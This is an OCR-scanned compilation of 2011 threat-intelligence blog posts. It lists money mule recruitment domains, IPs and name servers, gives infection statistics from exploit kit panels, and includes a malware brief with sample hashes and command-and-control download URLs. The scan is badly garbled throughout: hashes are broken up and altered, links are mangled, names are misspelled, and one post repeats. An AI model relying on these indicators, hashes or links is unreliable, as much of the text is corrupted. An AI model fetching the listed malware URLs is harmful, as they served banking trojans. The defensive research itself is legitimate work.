INTEGRATED-EUROPE-IT.NET - 78.46.105.205 - Email: 
admin@integrated-europe-it.net 
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ITAGROUP-USA.NET - 98.141.220.117 - Email: 
admin@itagroup-usa. net 



IT-ANAUSYS.COM - 98.141.220.115 - Email: 
yea@mailae. com 

ITANALYSISCROUP.NET -98.141.220.116 - Email: 
admin@itanalysisgroup. net 

KADE-GROUPDE.NET - 78.46.105.205 - Email: 
zigzag@fxmaii. net 

MASTERARTUSA.COM - 98.141.220.114 - Email: 
day@maiiae. com 

NARTEN-ART.COM - 209.190.4.91 - Email: 
giamor@fxmail. net 

NARTENART.NET 209.190.4.91 - Email: 
admin@nartenart. net 

quad-groupuk.cc - 78.46.105.205 - Email: 
prissy@maiiae. com 

REFINEMENT-ANTIQUE.COM 184.168.64.173 - Email: 
xe@fxmail.net 

SCAR-BEUNC.COM -184.168.64.173 - Email: admin@scar- 
beiinc.com 

SKYLINE-ANTIQUE.COM - 209.190.4.91 - Email: 
blurs@mailae. com 

SKYLINE-LTD.NET 209.190.4.91 - Email: admin@skyline- 
ltd.net 

SMARTLLC-UK.COM - 193.105.134.234 - Email: 
admin@smartllc-uk. com 

SMART-LLC-UK.NET 193.105.134.233 - Email: 
pol@mailae. com 



SPECIAL-ARTUK.COM - 193.105.134.232 - Email: 
admin@special-artuk. com 

SUBUMELTD.COM - 98.141.220.118 - Email: 
admin@sublimeltd. com 

TODEX-GROUP.NET - 184.168.64.173 - Email: 
admin@todex-group. net 
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The domains reside within the following ASs: AS10297, 
RoadRunner RR-RC; AS42708; PORTLANE Network; AS26496; 

GODADDY.com; AS29713 ’ INTERPLEXINC; AS24940, 
HETZNER-AS Hetzner Online. 

Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru 
NS2.MKNS.SU - 46.4.148.119 
NS3.MKNS.SU - 184.82.158.76 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 

NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 

NS1.MNAMEDL.SU - 85.25.250.211 - Email: 
mnamed@yourisp. ru 

NS2.MNAMEDL.SU - 46.4.148.118 


NS3.MNAMEDL.SU - 184.82.158.75 


NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 

NS2.DNSUS.SU - 87.118.81.7 
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NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: iavier@bz3.ru 

NS2.NAMEUSNS.SU - 84.19.161.7 

NS3.NAMEUSNS.SU - 84.19.161.10 

NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free- 
id.ru 

NS2.USDENNS.SU - 84.19.161.7 

NS3.USDENNS.SU - 84.19.161.10 

NS1.NAMESUKNS.CC - 86.55.210.4 - Email: pal@bz3.ru 

NS2.NAMESUKNS.CC - 193.105.134.232 

NS3.NAMESUKNS.CC - 193.105.134.237 

NS1.NAMEUK.AT - 86.55.210.5 - Email: admin@nameuk.at 

NS2.NAMEUK.AT 193.105.134.233 

NS3.NAMEUK.AT 193.105.134.236 

NS1.UKDNSTART.NET 86.55.210.5 - Email: 
admin@ukdnstart. net 

NS2.UKDNSTART.NET 193.105.134.233 


NS3.UKDNSTART.NET 193.105.134.236 



NSl.DENDRUYOS.NET 86 55 210 4 - Email: 
admin@dendruyos. net 

NS2.DENDRUYOS.NET 193.105.134.232 

NS3.DENDRUYOS.NET 193.105.134.237 

NS1.DEDNSAUTH.NET - 86.55.210.2 - Email: 
admin@dednsauth.net 

NS2.DEDNSAUTH.NET - 193.105.134 230 

NS3.DEDNSAUTH.NET - 193.105.134.239 

NS1.DELTOPOOR.AT - 86.55.210.3 - Email: 
admin@deitopoor.at 

NS2.DELTOPOOR.AT - 193.105.134.231 

NS3.DELTOPOOR.AT - 193.105.134.238 

Monitoring of ongoing money mule recruitment campaigns is 
ongoing. 

Related posts: 

[2] Keeping Money Mule Recruiters on a Short Leash - Part 
Nine 

[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Eight - Historical OSINT 

[4] Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[5] Keeping Money Mule Recruiters on a Short Leash - Part Six 



[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[7] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[9] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[10] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[HJMoney Mule Recruiters on Yahoo!'s Web Hosting 

[12] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[13] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[14] Keeping Reshipping Mule Recruiters on a Short Leash 

[15] Keeping Money Mule Recruiters on a Short Leash 

[16] Standardizing the Money Mule Recruitment Process 

[17] lnside a Money Laundering Group's Spamming 
Operations 

[18] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[19] Money Mules Syndicate Actively Recruiting Since 2002 
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Summarizing ZD Net's Zero Day Posts for July (2011- 
08-22 18:06) 

The following is a brief summary of all of my posts at 
ZDNet's Zero Day for July. You can subscribe to my 

[ljpersonal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 

01.[3]'Leaked Video of Casey Anthony CONFESSING to 
Lawyer!' scam spreading on Facebook 

02. [4]Anonymous leaks 90,000+ emails from compromised 
military contractor Booz Allen Flamilton 

03. [5]'This girl must be Out of her Mind to do this on live 
Television!' scam spreading on Facebook 

04. [6]Spamvertised bank statements serving scareware 

05. [7]internet Explorer 9 outperforms competing browsers 
in malware blocking test 

06.[8]'Leaked Video! Amy Winehouse on Crack hours before 
death' scam spreading on Facebook 

07.[9]Pfizer's Facebook hacked by AntiSec 

08. [10]90,000+ pages compromised in mass i Fra me 
injection attack 

09. [11}Amazon's cloud services systematically exploited by 
cybercriminals 

This post has been reproduced from [12]Dancho 
Danchev's blog. Follow him [13Jon Twitter. 
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A Peek Inside Web Malware Exploitation Kits (2011- 
08-29 13:19) 

With web malware exploitation kits, continuing to represent 
the attack method of choice for the majority of 

cybercriminals thanks to the [1/overall susceptibility of end 
and [2]enterprise users to client-side exploitation attacks, 
it's always worth taking a peek inside them from the 
perspective of the malicious attacker. 

In this post, we'll take a peek inside three web malware 
exploitation kits, and discuss what makes them think 

in terms of infected OSs, browser plugins and client-side 
exploits. 

Dragon Pack Web Malware Exploitation Kit 

[3] 

What we've got here is a rather modest in terms of activity, 
web malware exploitation kit admin panel. We've got 

45 successful loads based on 588 unique visits, with the 
JavaRox exploit executed 42 times, successfully infecting 20 













Fire fox users. The exploits have successfully loaded on 
Windows XP 14 times, on Windows XP 5P2 3 times, on 

Windows Vista 12 times, and on Windows 7 15 times. 

Dragon Exploit Pack 
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The Dragon Exploit Pack has 45 successful loads based on 
587 unique visitors, with the JavaJDK exploit executed 

successfully 42 times. The kit is counting 13 successful loads 
on MSIE 8, and another 20 on Fire fox, with 14 successful 
loads recorded for Windows XP, 2 on Windows XP 5P2, 12 on 
Windows Vista and 15 on Windows 7. 

Katrin Exploit Pack 
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The Katrin Exploit Pack has 3277 successful loads based on 
19933 unique visits, which represents a 17.32 % infection 
rate. The Java JSM exploit has been successfully loaded 535 
times, Java SMB has been loaded 576 times, Java OBE 

has been loaded 914 times, Old 4 PDF has been loaded 87 
times, Libtiff PDF has been loaded 726 times, MDAC has 

been loaded 96 times, Snapshot has been loaded 104 times, 
and FICP has been loaded 239 times. 

The kit is counting 452 successful exploitation attempts 
against MSIE 5, 786 against MSIE7, 1198 against MSIE 


8, 274 against Chrome, 522 against Fire fox, 24 against 
Opera and 14 against Safari. The majority of loads have 

affected Windows XP installations, with 2107 successful 
loads targeting the OS, following 625 on Windows Vista, and 
503 on Windows 7. 

Liberty Exploit Pack 
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The Liberty Exploit pack screenshot, is showing the 
proportion successfully infected web browsers, with total of 
555 

successful loads based on 3029 unique visitors. 397 loads 
have affected Internet Explorer 6, 89 Internet Explorer 7, and 
54 Firefox. 

Bleeding Life Exploit Pack 
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In this Bleeding Life web malware exploitation kit, we can 
clearly seen the dynamics behind the infections taking place. 
We see 554 successful loads based on 4106 unique visitors. 
JavaSignedApplet has been executed 161 times, 

Adobe-90-2010-0188 has been executed 67 times, Adobe- 
80-2010-0188 has been executed 46 times, Java-2010- 

0842 has been executed 203 times, Adobe-2008-2992 has 
been executed 74 times, and Adobe-2010-1297 has been 


executed 2 times. 


The majority of the infected population is based in the U.S, 
United Kingdom, Qatar, and Malaysia. Windows 

XP has the highest market share of infected OSs, with 336 
successful loads based on 2098 unique visitors. Followed by 
Windows 7 with 139 toads based on 1256 unique visitors, 
and 73 unique loads based on 719 unique visitors for 

Windows Vista. 

This post has been reproduced from [4]Dancho 
Danchev's blog. Follow him [5Jon Twitter. 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Eleven (2011-08-29 15:51) 




























The following intelligence brief is part of the [ 1 ] Keeping 
Money Mule Recruiters on a Short Leash series. In it, 

I'll expose currently active money mule recruitment domains, 
their domain registration details, currently responding 

IPs, and related ASs. 

Money mule recruitment domains: 
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ACWOODE-GROUP.COM - 78.46.105.205 - Email: 
admin@acwoode-group. com 

ACWOODE-GROUP.NET - 78.46.105.205 - Email: 
admin@acwoode-group. net 

ART-GAPSON.COM - 78.46.105.205 - Email: admin@art- 
gapson.com 

CONDOR-LLC-UK.NET - Email: admin@condor-llc-ul<.net 
CONDORLLC-UK.COM - Email: plods@fxmail.net 

DE-DVFGROUP.BE 

ELENTY-CO.NET - Email: abcs@mailti.com 

ELENTY-LLC.COM - 78.46.105.205 - Email: admin@elenty- 
llc. com 

fabia-art.com - 209.190.4.91 - Email: adios@cutemail.org 

fine-artgroup.com - 209.190.4.91 

GAPSONART.NET - 78.46.105.205 - Email: 
admin@gapsonart. net 


gmd-contracting.com -194.242.2.56 - Email: 
admin@gmd-contracting. com 

GURU-GROUP. CC - 78.46.105.205 - Email: admin@guru- 
group.cc 

GURU-GROUP.NET - 78.46.105.205 - Email: jj@cutemail.org 

INTECHTODEX-GROUP.COM - 78.46.105.205 - Email: 
uq@maiil3.com 

ltd-scg.net - 209.190.4.91 - Email: amykylir@yahoo.com 

NARTEN-ART.COM - 78.46.105.205 - Email: 
glamor@fxmail. net 

NARTENART.NET 78.46.105.205 - Email: 
admin@nartenart. net 

panart-llc.com - 78.46.105.205 - Email: admin@panart- 
llc. com 

REFINEMENT-ANTIQUE.COM 78.46.105.205 - Email: 
xe@fxmail.net 

REFINEMENTUK-LTD.NET - 78.46.105.205 - Email: 
admin@refinementuk-ltd. net 

SKYLINE-ANTIQUE.COM - 78.46.105.205 - Email: 
blurs@mailae. com 

SKYLINE-LTD.NET 78.46.105.205 - Email: admin@skyline- 
ltd.net 
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techce-group.com -184.168.64.173 - Email: 
admin@techce-group. com 


TODEX-GROUP.NET - 78.46.105.205 - Email: admin@todex- 
group.net 

triad-webs.com - 85.17.24.226 

The domains reside within the following ASs: AS24940, 
HETZNER-AS Hetzner Online AG RZ; AS16265, Lease Web 
B.V. 

Amsterdam; AS26496, GODADDY .com, Inc.; AS10297, 
RoadRunner RR-RC-Enet-Columbus. 
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Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru 

NS2.MKNS.SU - 46.4.148.119 

NS3.MKNS.SU - 184.82.158.76 

NS1.MNAMEDL.SU - 85.25.250.211 - Email: 
mnamed@yourisp. ru 

NS2.MNAMEDL.SU - 46.4.148.118 

NS3.MNAMEDL.SU - 184.82.158.75 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 

NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 


NS1.NAMESUKNS.CC - Email: pal@bz3.ru 

NS2. NAMESUKNS. CC 
NS3. NAMESUKNS. CC 

NS1.NAMEUK.AT - Email: admin@nameuk.at 
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NS2.NAMEUK.AT 

NS3.NAMEUK.AT 

NS1.UKDNSTART.NET - Email: admin@ukdnstart.ne 

NS2. UKDN START. NET 
NS3. UKDN START. NET 

Monitoring of ongoing money mule recruitment campaigns is 
ongoing. 

Related posts: 

[2] Keeping Money Mule Recruiters on a Short Leash - Part Ten 

[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Nine 

[4] Keeping Money Mule Recruiters on a Short Leash - Part 
Eight - Historical OSINT 

[5] Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[6] Keeping Money Mule Recruiters on a Short Leash - Part Six 



[7] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[8] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[9] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[10] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[11 ]Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[12[Money Mule Recruiters on Yahoo!'s Web Hosting 

[13] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[14] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[15] Keeping Reshipping Mule Recruiters on a Short Leash 

[16] Keeping Money Mule Recruiters on a Short Leash 
[17[Standardizing the Money Mule Recruitment Process 

[18] lnside a Money Laundering Group's Spamming 
Operations 

[19] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[20] Money Mules Syndicate Actively Recruiting Since 2002 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Eleven (2011-08-29 15:51) 

The following intelligence brief is part of the [ 1 /Keeping 
Money Mule Recruiters on a Short Leash series. In it, 










































I'll expose currently active money mule recruitment domains, 
their domain registration details, currently responding 

IPs, and related ASs. 

Money mule recruitment domains: 
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ACWOODE-GROUP.COM - 78.46.105.205 - Email: 
admin@acwoode-group. com 

ACWOODE-GROUP.NET - 78.46.105.205 - Email: 
admin@acwoode-group. net 

ART-GAPSON.COM - 78.46.105.205 - Email: admin@art- 
gapson.com 

CONDOR-LLC-UK.NET - Email: admin@condor-Uc-uk.net 
CONDORLLC-UK.COM - Email: plods@fxmail.net 

DE-DVFGROUP.BE 

ELENTY-CO.NET - Email: abcs@mailti.com 

ELENTY-LLC.COM - 78.46.105.205 - Email: admin@elenty- 
llc. com 

fabia-art.com - 209.190.4.91 - Email: adios@cutemail.org 

fine-artgroup.com - 209.190.4.91 

GAPSONART.NET - 78.46.105.205 - Email: 
admin@gapsonart. net 


gmd-contracting.com -194.242.2.56 - Email: 
admin@gmd-contracting. com 


CURU-CROUP.CC - 78.46.105.205 - Email: admin@guru- 
group.cc 

GURU-CROUP.NET - 78.46.105.205 - Email: jj@cutemail.org 

INTECHTODEX-GROUP.COM - 78.46.105.205 - Email: 
uq@maill3.com 

ltd-scg.net - 209.190.4.91 - Email: amykylir@yahoo.com 

NARTEN-ART.COM - 78.46.105.205 - Email: 
glamor@fxmail. net 

NARTENART.NET 78.46.105.205 - Email: 
admin@nartenart. net 

panart-llc.com - 78.46.105.205 - Email: admin@panart- 
llc. com 

REFINEMENT-ANTIQUE.COM 78.46.105.205 - Email: 
xe@fxmail.net 

REFINEMENTUK-LTD.NET - 78.46.105.205 - Email: 
admin@refinementuk-ltd. net 

SKYLINE-ANTIQUE.COM - 78.46.105.205 - Email: 
blurs@mailae. com 

SKYLINE-LTD.NET 78.46.105.205 - Email: admin@skyline- 
ltd.net 
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techce-group.com -184.168.64.173 - Email: 
admin@techce-group. com 


TODEX-GROUP.NET - 78.46.105.205 - Email: admin@todex- 
group.net 

triad-webs.com - 85.17.24.226 

The domains reside within the following ASs: AS24940, 
HETZNER-AS Hetzner Online AG RZ; AS16265, Lease Web 
B.V. 

Amsterdam; AS26496, GODADDY .com, Inc.; AS10297, 
RoadRunner RR-RC-Enet-Columbus. 
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Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru 

NS2.MKNS.SU - 46.4.148.119 

NS3.MKNS.SU - 184.82.158.76 

NS1.MNAMEDL.SU - 85.25.250.211 - Email: 
mnamed@yourisp. ru 

NS2.MNAMEDL.SU - 46.4.148.118 

NS3.MNAMEDL.SU - 184.82.158.75 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 

NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 


NS1.NAMESUKNS.CC - Email: pal@bz3.ru 

NS2. NAMESUKNS. CC 
NS3. NAMESUKNS. CC 

NS1.NAMEUK.AT - Email: admin@nameuk.at 
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NS2.NAMEUK.AT 

NS3.NAMEUK.AT 

NS1.UKDNSTART.NET - Email: admin@ukdnstart.ne 

NS2. UKDN START. NET 
NS3. UKDN START. NET 

Monitoring of ongoing money mule recruitment campaigns is 
ongoing. 

Related posts: 
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17. htto://ddanchev.blo as oot.com/2009/10/standardizin a- 
monev-mule-recruitment.html 

18. htto.V/ddanchev.blo as oot.com/2009/05/inside-mone v- 
launderin a- arouD5-5oammina.html 

19. htto.V/ddanchev.blo as oot.com/2008/07/monev-mule- 
recruiters-use-asoroxs-fast.html 
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20. htto.V/ddanchev.blo as oot.com/2008/10/monev-mules- 
s vndicate-activelvhtml 

21. htto.V/ddanchev.blo as oot. com/ 
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Summarizing 3 Years of Research Into Cyber Jihad 
(2011-09-11 13:34) 



On this very special day, I'd tike to honor the fallen by 
summarizing my research into cyber jihad, a topic I'm still 
highly passionate about. Enjoy and share it with your social 
circle! 

1. [ljTracking Down Internet Terrorist Propaganda 

2. [2JArabic Extremist Croup Forum Messages' 
Characteristics 

3. [3]Cyber Terrorism Communications and 
Propaganda 

4. [4JA Cost-Benefit Analysis of Cyber Terrorism 

5. [5]Current State of Internet Jihad 

6. [6]Analysis of the Technical Mujahid - Issue One 

7. [7] Full List of Hezbollah's Internet Sites 

8. [8]Steganography and Cyber Terrorism 
Communications 

9. [9]Hezbollah's DNS Service Providers from 1998 to 
2006 

10. [lOjMujahideen Secrets Encryption Tool 

11. [lljAnalyses of Cyber Jihadist Forums and Blogs 

12. [12]Cyber Traps for Wannabe Jihadists 

13. [13]lnshallahshaheed - Come Out, Come Out 
Wherever You Are 

14. [14JCIMF Switching Blogs 



15. [15JGIMF Now Permanently Shut Down 

16. [16JGIMF - "We Will Remain" 

17. [17]Wisdom of the Anti Cyber Jihadist Crowd 

18. [18]Cyber Jihadist Blogs Switching Locations 
Again 

19. [19]Electronic Jihad v3.0 - What Cyber Jihad isn't 

20. [20]Electronic Jihad's Targets List 

21. [21]Teaching CyberJihadists How to Hack 

22. [22]A Botnet of Infected Terrorists? 

23. [23]infecting Terrorist Suspects with Malware 

24. [24]The Dark Web and Cyber Jihad 
827 

25. [25]Cyber Jihadist Hacking Teams 

26. [26]Two Cyber Jihadist Blogs Now Offline 

27. [27]Characteristics of Islamist Websites 

28. [28]Cyber Traps for Wannabe Jihadists 

29. [29]Mujahideen Secrets Encryption Tool 

30. [30]An Analysis of the Technical Mujahid - Issue 
Two 

31. [31 JTerrorist Groups' Brand Identities 

32. [32]A List of Terrorists' Blogs 



33. [33]Jihadists' Anonymous Internet Surfing 
Preferences 

34. [34]Sampling Jihadists' IPs 

35. [35]Cyber Jihadists' and TOR 

36. [36]A Cyber Jihadist DoS Tool 

37. [37JCIMF Now Permanently Shut Down 

38. [38]Mujahideen Secrets 2 Encryption Tool 
Released 

39. [39]Terror on the Internet - Conflict of Interest 

This post has been reproduced from [40]Dancho 
Danchev's blog. Follow him [41]on Twitter. 

1. htto.V/ddanchev.blo as oot.com/2006/06/trackina-down- 
internet-terrorist.html 

2. htto://ddanchev.blo as oot. com/2006/05/arabic-extremist- 
arouQ-forum-messaaes. html 

3. htto.V/ddanchev.blo as oot.com/2006/08/cvber-terrorism- 
communications-and_22.html 

4. htto.V/ddanchev.blo as oot. com/2006/1O/cost-benefit- 
analvsis-of-cvber html 

5. httoV/ddanchev.blo as oot.com/2006/12/current-state-of- 
internet-iihad.html 

6. htto.V/ddanchev.blo as oot. com/2006/12/analvsis-of- 
technical-muiahid-issue-one. html 





























7. htto.V/ddanchev.blo as oot.com/2006/12/full-list-of- 
hezbollahs-internet-sites.html 


8. htto.V/ddanchev.blo as oot.com/2006/08/steaano araDhv- 
and-cvber-terrorism. himI 

9. htto://ddanchev.blo as oot. com/2006/09/hezbollahs-dns- 
service-oro viders-from, h tm / 

10. htto://ddanche i/. blo as oot. com/2007/04/m uiahideen- 
secrets-encr v otion-iool, html 

11. htto.V/ddanche i/. blo as oot. com/2007/08/analvses-of- 
c vber-iihadist-forums-and. html 

12. htto.V/ddanche i/. blo as oot. com/2007/03/cvber-traos-for- 
wannabe- i ihadists.html 

13. 

htto.V/ddanche v. blo as oot. com/2007/12/inshallahshaheed- 
come-out-come-out.html 

14. htto.V/ddanche i/. blo as oot. com/2007/07/aimf-switchin a- 
bloas.html 

15. httoV/ddanchev.blo as oot.com/2007/08/aimf-now- 
oermanentlv-shut-down.html 

16. htto.V/ddanche i/. blo as oot. com/2007/08/aim f- we-will- 
remain.html 

17. htto.V/ddanche i/. blo as oot. com/2007/10/wisdom-of-anti- 
c vbeniihadist-crowd.html 


18. htto.V/ddanche i/. blo as oot. com/2007/11/cvber-iihadist- 
bloas-switchina. html 


























































19. htto.V/ddanchev. blo as oot. com/2007/11/electronic-iihad- 
v30- wha t-cvber-iihad. html 

20. htto.V/ddanchev. blo as oot. com/2007/11/electronic-iihads- 
taraets-list.html 

21. htto.V/ddanchev.blo as oot.com/2007/11/teachin a-c vber- 
iihadists-how-to-hack. html 

22. htto.V/ddanchev. blo as oot. com/2007/11/botnet-of- 
infected-terrorists.html 
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23. htto.V/ddanchev. blo as oot. com/2007/09/infectin a- 
terrorist-susoects- with, html 

24. htto.V/ddanche v. blo as oot. com/2007/09/dark- web-and- 
c vber-iihad.html 

25. htto.V/ddanchev. blo as oot. com/2007/12/cvber-iihadist- 
hackina-teams. html 

26. htto.V/ddanchev. blo as oot. com/2007/09/two-cvber- 
iihadist-bloas-no w-off1ine.html 

27. htto.V/ddanche i/. blo as oot.com/2007/02/characteristics- 
o f-islamist~websites.htm / 

28. htto.V/ddanchev. blo as oot. com/2007/03/cvber-traos-for- 
wannabe-iihadists.html 

29. htto.V/ddanchev.blo as oot. com/2007/04/muiahideen- 
secrets-encr v otion-tool. html 

30. htto.V/ddanchev.blo as oot. com/2007/06/analvsis-of- 
technical-muiahid-issue-two.html 

























































31. http.V/ddanchev. blo as oot. com/2007/07Zterrorist-arouos- 
brand-identities. html 

32. http.V/ddanche v. b lo g s pot, com/2007/06/1ist-o f-terrorists- 
bloas.html 

33. http.V/ddanche v. b lo gs pot, com/2007/05/iihadists- 
anon vmousdnternet-surfina.html 

34. http.V/ddanche v. b lo g s pot, com/2007/05/samoiin a- 
iihadists-ips. html 

35. http://ddanchev.blo as pot.com/2007/07/cvbeniihadists- 
and-torhtml 

36. http://ddanchev.blo as pot.com/2007/Q8/cvber-iihadist- 
dos-tool.html 

37. http.V/ddanchev.blo as oot.com/2007/08/aimf-now- 
oermanentlv-shut-down.html 

38. http.V/ddanchev.blo as oot. com/2008/01/muiahideen- 
secrets-2-encr v ption-tool. html 

39. http.V/ddanchev. blo as oot. com/2008/03/terror-on- 
internet-conflict-of-interest. html 

40. http.V/ddanchev. blo as oot. com/ 

41. http://twitter, com/danchodanchev 
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Summarizing ZD Net's Zero Day Posts for August 
(2011-09-27 19:13) 















































The following is a brief summary of all of my posts at 
ZDNet's Zero Day for August. You can subscribe to my 

[Impersonal RSS feed, [2[Zero Day's main feed, or 

follow me on Twitter: 

01. [3[Study: Rootkits target pirated copies of Windows XP 

02. [4]56 percent of enterprise users using vulnerable 
Adobe Reader plugins 

03. [5]New malware attack circulating on Facebook 

04. [6]Kaspersky: 12 different vulnerabilities detected on 
every PC 

05. [7]Spamvertised Uniform traffic tickets and invoices 
lead to malware 

06. [8 [Latest version of Skype susceptible to malicious code 
injection flaw 

07. [9]Spamvertised 'Scan from a Xerox WorkCentre Pro' 
leads to malware 

08. [lOJMaiware Watch: FDIC and Western Union themed 
emails lead to malware 

This post has been reproduced from [HJDancho 
Danchev's blog. Follow him [12]on Twitter. 

1. httD://www.zdnet.com/toDics/dancho+danchev? 
o=l&mode=rss&ta g =mantle skin:content 

2. htto://feeds.feedburner. com/zdnet/securit v 


830 








3. http://www.zdnet.com/bloa/securitv/studv-rootkits-taraet- 
oira ted-cooies-of- windo ws-xo/9223 

4. http://www.zdnet.com/bloa/securitv/56-percent-of- 
enterDrise-users-usina-vulnerable-adobe-reader-Dluains/9 

241 


5. http://www.zdnet.com/bloa/securitv/new-malware-attack- 
circulatina-on-facebook/9281 

6. htto://www.zdnet. com/bloa/securitv/kasoerskv-12- 
different-vuinerabUities-detected-on-ever v- oc/9283 

7. htto://www.zdnet.com/bloa/securit v/s oamvertised- 
uniform-traffic-tickets-and-invoices-lead-to-malware/9289 

8. http://www.zdnet.com/bloa/securitv/latest-version-of- 
skv De-susceotible-to-malicious-code-iniection-fJaw/9 

295 


9. htto.V/www.zdnet.com/bloa/securit v/s oamvertised-scan- 
from-a-xerox- workcentre-oro-leads-to-malwa re/9315 

10. htto.V/www.zdnet. com/bloa/securitv/malware-watch-fdic- 
and-western-union-themed-emails-lead-to-malware/932 

8 

11. http.V/ddanchev. blo as oot. com/ 

12. http://twitter, com/danchodanchev 





















































Spamvertised 'Uniform Traffic Ticket' and 'FDIC 
Notifications' Serving Malware - Historical OS I NT 

(2011-09-28 14:43) 

The following intelligence brief will summarize the findings 
from a brief analysis performed on two malware 

campaigns from August, namely, the [lfspamvertised 
Uniform Traffic Tickets and the [2JFDIC Notification. 

Uniform Traffic Tickets 

Spamvertised attachments - Ticket-728-2011.zip; Ticket- 
064-211.zip; Ticket- 728-201 l.zip 

Detection rates: 

Ticket.exe - [3]Cen:Trojan.Heur.FU.bqW@aK9ebrii - 

Detection rate: 37/43 (86.0 %) 

MD5 : 6361 d4a40485345cl 84 73f3c6b4b6609 

SHA1 :50b09bb2e0044aal39a84c2e445a56f01d70cl 85 

SHA256: 

ca67al4bfed2a 7bc2ac8be9c01 cbl 7d5dal2b75320b4bad4f 
e8d8a6759ad9725 

Ticketl.exe - [4]Trojan-Downloader. Win32.Small.ccxz - 

Detection rate: 36/44 (81.8 %) 

MD5 : e2a2d67b8a52ae655f92779bec296676 

SHA1 : ed3df72b4e073ffba 7174ebc8cb 77b2b 7d012cbf 

SHA256: 

50bl 04c5f8314327e03b01 e 7f7c2535d8de 7cd9f73f8el 6dl 3 



64c7fd021a90cc 


Upon execution the samples phone back to: 

sdkjgndfjnf.ru/pusk3.exe - 91.220.0.55 (responding to 
the same IP is also survey-providers.info) - A551630 - Email: 
832 

admin@sdkjgndfjnf.ru 

rattsillis.com/ftp/g.php -195.189.226.109; 
178.208.77.247; 195.189.226.107; 195.189.226.108 - 
AS41018 - Email: admin@jokelimo.com 

rattsillis. com/pusk3.exe -195.189.226.109; 
178.208.77.247; 195.189.226.107; 195.189.226.108 - 
AS41018 - Email: admin@jokelimo.com 

DNS emulation of nsl.lemanbrostm.info reveals two 
domains belidiskalom.com - 178.208.76.175 - Email: 
admin@belidiskalom.com and lemanbrostm.info - Email: 
coz@yahoo.com using the same name server. 

Known MD5 modifications for pusk3.exe at 
rattsillis. com: 

C6dab856705b5dfd09b2adbel0701b05 
fl 67213c6a 79f2313995e80a8ac29939 
f4764cce5c3795bl d63a299a5329d2e2 
dae9e76535734 78a 6b41 a 62f7cb99cl 2 
69c983c9dfaf37e346004c9aaf54a3d0 


d875b8e32a231405c7fa96b810e9b361 



628270c6e44b Ofa21 ef8e8 7c6bc36f5 7 


9b69dabd876e967bcd2eb85465175e3b 

0434c084dba8626df980c7974d5728el 

Related binaries and associated MD5 modifications: 

rattsillis.com/blood.exe - MD5: 

23795cb9b2f5el 9eff0df0cf2fba9247; 
82b6fl8bl30alf0celce928d0980fab0 

rattsiUis.com/pusk.exe - MD5: 

55d8e25bc373a98c5c29284c989953ab; 

368c86556e827d898f043a4d5f378fa0; 

7411 d0d29db91 f2625ee36d438eb6ac4; 
3ea4e9fd297b3058ebbb360cl581aaac; 

rattsiiiis.com/pusk2.exe - MD5: 
dae9e76535734 78a 6b41 a 62f7cb99cl 2; 
b 73705c097c9be9779730d801 a d098e0; 

d7952cl e 7 7d7bb250cdfa88el57fb5a8 

Known MD5 modifications for pusk3.exe at 
sdkjgndfjnf.ru: 8672f021e7705b6a8132b7dfc21617cf 

sdkjgndfjnf.ru/blood.exe - MD5: 

577cf0b 7ca3d5bcbe35764024f241fa8; 
ebf7278a7239378e7d70d426779962ce 

sdkjgndfjnf.ru/pusk2.exe - MD5: 
d9e36e25a3181 f574fd5d520cb501 d3a 

sdkjgndfjnf.ru/pusk.exe - MD5: 
fce04f7681283207d585561ed91 e 7 7b4 



sdkjgndfjnf.ru/blood.exe - MD5: 

577cfOb 7ca3d5bcbe35764024f241fa8 

Detection rate for blood.exe: 

blood.exe - [5]Trojan-Spy. Win32.Zbot - 25/44 (56.8 %) 

MD5 : 577cf0b7ca3d5bcbe35764024f241fa8 

SHA1 : 30f542a44d06d9125cdfbdd38d79de778e4c0791 

SHA256: 

1741ef5d24641ee99b5d78a68109162bebc714c3dl9abc37 
e3d44 72f3dcd6fl 8 

833 

K 

FDIC Notification 

Spamvertised attachments: FDIC _Document.zip 
Detection rate: 

FDIC_Document.exe - 

Gen:Trojan. Fleur. FU.bq W@a45Fklbi - 35/44 (79.5 %) 

MD5 : 7b5a271c58c6bbl8d79cd48353127ff6 SHA1 : 
6526b6097df42f93bee25d7ea 73f95d2fcc24d3a 5HA256: 

a09165c71a8dd2al338b2bd0c92ae07495041ael5592e343 

2bd50600e6ef2af0 

Upon execution phones back to: 

rattsillis. com/ftp/g.php 


rattsillis. com/blood, exe 

